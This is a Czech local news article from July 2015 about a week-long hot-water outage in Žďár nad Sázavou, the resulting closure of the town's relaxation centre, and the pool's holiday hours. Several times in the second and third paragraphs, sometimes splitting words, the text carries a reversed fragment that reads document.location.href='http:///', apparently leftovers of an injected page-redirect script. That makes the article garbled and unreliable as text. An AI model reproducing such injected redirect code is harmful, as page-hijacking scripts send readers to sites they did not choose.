Rainbow page separator

Od pondělí do pátku ve Žďáře nepoteče teplá voda

Pondělí, 27. července 2015

Žďár nad Sázavou / Dodávka teplé užitkové vody od společnosti SATT bude ve Žďáře nad Sázavou přerušena v době do pondělí 27. do pátku 31. července. Důvodem odstávky je údržba horkovodní sítě. Dodávka teplé vody bude žďárským obyvatelům obnovena poslední červencový den v odpoledních hodinách.
V souvislosti s přerušením dodávky tepelné energie pro ohřev užitkové vody bude rovněž mimo provoz žďárské relaxační centrum, a [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to ve dnech 27. července až 3. srpna.
Prázdninová provozní doba bazénu je jinak denně od půl desáté dopoledne do dvaceti hodin pro plavecké bazény a solnou jeskyni, wellness aktivity ve smíšeném režimu jsou v provozu v době od 11 do 20 hodin. V [„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tom[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];to období je zároveň návštěvníkům posky[„\’///:ptth\’=ferh.noitacol.tnemucod“];[„\’///:ptth\’=ferh.noitacol.tnemucod“];tována třicetiprocentní sleva ze vstupného v plaveckých bazénech na základě prázdninového ceníku.